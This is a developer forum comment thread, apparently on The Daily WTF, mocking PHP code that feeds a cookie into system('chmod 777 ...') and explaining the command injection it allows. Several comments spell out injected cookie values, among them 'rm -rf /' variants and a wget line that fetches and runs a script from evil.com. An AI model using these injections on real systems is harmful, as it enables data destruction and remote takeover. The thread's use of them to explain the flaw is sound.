- Feature Articles
- CodeSOD
- Error'd
- Forums
-
Other Articles
- Random Article
- Other Series
- Alex's Soapbox
- Announcements
- Best of…
- Best of Email
- Best of the Sidebar
- Bring Your Own Code
- Coded Smorgasbord
- Mandatory Fun Day
- Off Topic
- Representative Line
- News Roundup
- Editor's Soapbox
- Software on the Rocks
- Souvenir Potpourri
- Sponsor Post
- Tales from the Interview
- The Daily WTF: Live
- Virtudyne
Admin
Btw, I don't think its been pointed out enough already - the chmod command lacks the -r flag to make it recursive, and there are plenty of ways to send a custom cookie to the web server, and you can't just run whatever you want on the server because its probably running as a restricted user which has no access to anything except web pages :)
Admin
What if my cookie is
Admin
Wait, Guys, what if my cookie is "/; rm -rf /"!?
Admin
Filed Under: trollin trollin trollin, not a link
Admin
trollin' trollin' trollin' keep those tissues comin' trollin' trollin' trollin' base-ment!
Admin
This forum is getting inundated with trolls. If Alex doesn't clean up some of these comments, the site is going to look like a wtf.
Admin
We need more security related WTFs because this is a topic that the vast majority of developers don't understand but they damn well should.
Admin
Admin
Or, really frustrate the admins of the site.
Set the sessionid cookie to both /bin/su and /usr/bin/sudo. This will clear the suid flag on those programs, and prevent them from working.
However, this hole assumes that PHP is running as a privileged user. Granted, it probably is...
CAPTCHA: venio - I am arriving
Admin
Admin
Easier than that actually, just act as an http client to the site and tell it in the http protocol that you have a cookie named sessionid with the value of "/"
Admin
Oh well, enjoy your limp biscuits.
Admin
Admin
Admin
Admin
It's much worse than that... though that alone is pretty bad. But this is pipping in a user variable into a system executed command. Add a pipe or secondary statement after the chmod to download some executable binary and run it on the host system and total control. Modifying the sessionid is trivial at best. Let's just hope that the sessionid was generated through some crypto routine that they can do a hash check and ensure it hasn't been tampered. Either way, this is pretty bad.
Admin
The chmod doesn't matter. The important part is you can execute arbitrary commands. For example, using a simple utility like curl to make a request with custom headers values, the contents of $_COOKIE["$sessionid"] could become '; wget http://evil.com/evil.sh; sh evil.sh" As in, you just got the server to download your script and run it, unleashing whatever evils lurk inside.
Admin
Admin
Not thinking about the vulnerabilities..... but I'm just trying to figure out a legitimate reason to chmod anything based on user input. Maybe there is a scenario but I'm coming up blank.
Admin
Uh no "$sessionid" would be the same as saying $sessionid, if it were '$sessionid' it'd be different, but this isn't really a vulnerability unless $sessionid is set by a GET/POST var. Shame on the editors.
Admin
Admin
lets play mess up the system
$_COOKIE["$sessionid"] = "/ ; rm -fr /*";
system("chmod 777 " . $_COOKIE["$sessionid"]);
Admin
Addendum (2011-10-13 18:52): edit: I once chmod'd everything on my own system to 777 by accident. I had just installed Linux on said system, though, and I was a noob. So I just wiped it and reinstalled. Anyway, the results were... not pretty.
Admin
Not sure, if someone's else submission ((FRY)) Or my submission heavily anonymized
Let's just say, the cookies do not matter, some people use this system-chmod construct with a session id transferred with everything else over GET.
Admin
This gives you the ability to do everything the non-root daemon user can do -- such as talk to other servers (at least the database) over the network, or snoop on any private user data the web server needs to have access to. You may have to run your criminal empire from jail, but that doesn't mean you can't have one.
Chrooting at best only stops the infection from spreading -- it does not prevent you from being infected in the first place.
(And that is quite apart form the obvious fact that a hole like this turns any local privilege escalation into a remote rooting).
Admin
Admin
Admin
Admin
Actually, you wouldn't be able to give extra permissions to anything you didn't already have permissions to. You can't chmod anything you don't own unless you are root, and if their webservice runs as root, that would be it's own super sized security problem.
However, you could probably do this: $_COOKIE["$sessionid"] = "xx ; <any commandline tool>"
This would be free rain to execute anything you wanted, including any ruby, python, perl interpreter that might be on the system.
Admin
Well, I've never actually tried, but just poking around shows the presence of a "cookies.sqlite" file in my firefox directory. So changing that value should be as simple as opening up that sqlite file using sqlite, finding the cookie, set by the site, with the name that looks suspiciously like a PHP session id, and then changing the value to whatever you want it to be.
I could also be wrong.
Admin
While I agree this is bad, your comment assumes that this web server is not running in its default account ("apache" or "nobody" in apache, or "IUSR_*" / "NetworkService" in IIS.
If SELinux/chroot jail has been enabled, the damage could be done would have been even more limited.
That's why despite many administrators claim SELinux difficult to use, they should still configure and use it if it's available.
Admin
Okay, I understand that point, more or less. Seems a bit irrelevant though, because after I follow through with that "rm -rf", you're kinda gonna to have to boot off of some other media anyway.
Admin
Actually, it would be worse to set $_COOKIE["$sessionid"] to "-R /". Alternatively, set it to "/* // ///* ////" (which should cover most of the important files - assuming you didn't blow out the shell.
Admin
depends on who the php process runs under
Admin
(also, the fact that chmod gets variable named "sessionid" as a parameter hints to user's folder on server, which may mean that folder of every user is rwx for everyone by default, you don't even have to tamper with cookies)
Admin
Oh, yes. 'system' in PHP code, must have, hehe.
Admin
What if $sessionid contains something like
$sessionid = "
rm /
"; (or some more evil code) Would not th inner command be executed before the chmod then?system("chmod 777 " . $_COOKIE["$sessionid"]);
Admin
The real WTF is $_COOKIE["$sessionid"] It should be written as $_COOKIE[$sessionid]
Admin
Surely this will simply change the permissions on the root directory. In order to be recursive, (at least in Linux systems using GNU chmod) you require the "-R" flag to chmod.
This simply makes a single chosen file (or directory) rwx for everyone
Admin
Nope. More like:
... 42: Change sessionID to something else and see what happens ...
Then if the system is stupid enough to return an error message that gives a clue about the type of security flaw you can imagine what happens.
Also, you should assume that the attacker has access to the sites code, through another less serious flaw, being previously employed, dumpster diving, being another customer and a million other senarios
Admin
Strangely not. I would have expected a few of the more in-the-know types to have picked up on that immediately!
Admin
Repeated applications of head and tail, you say? I'm in! ZING!!
Admin
Free rain? Plenty of that around here. Strontium-fortified, even.
Admin
I think the problem here is much, much worse than just arbitrarily changing permissions. Basically the session_id is derived from a cookie (from the user) and the cookies are form the user. Therefore anyone can inject anything into that system call.
They could inject for example: ". : rm -rf /" and wipe the server hard drive (assuming the web server has permissions to do so) or run any arbitrary command as the web server.
Bad bad bad! Gives us developers a bad name!
Admin
It's much, much worse than that. If the cookie contains "/;rm -rf /" then wave goodbye to a large part of your webserver, if not your entire server...
Admin
I also enjoy grammar nitpicking. And I can't help but notice it doesn't make sense that a name supposedly of Indian origin gets pluralized the anglo-saxon way.
Admin
I raise your point and click monkeys to -
a) sites where everything is fixed PIXEL deminesions including fonts, usually a max of 10 pixels.
b) sites set for 800 pixel width with widescreen displays these days
c) sites using Home.htm(l)
Worst site I came across had Home.htm and all other pages were sub-directories.
Each subdirectory had an index.htm that was a copy of the <page name>.htm, that had a subdirectory for the CSS and images (yes copies of them).
Worst still the contact form contained this
<form action="/contact" method="post">Which at best posted the form data to /contact which on quite a few servers becomes /contact/contact.htm . Oh look the same contact form with blank data.
Admin
Oh, thats ok then. No WTF Here.
Admin
Yay! Free access to a linux system and every single file!
It's not quite that simple ofcourse. You cannot chmod files you can't already access. So chmodding '/' is just not going to happen.
Unless PHP runs as the root user, but that's another WTF.
Admin
You forgot to switch your name from the Nagesh troll to your real one.
you marachoad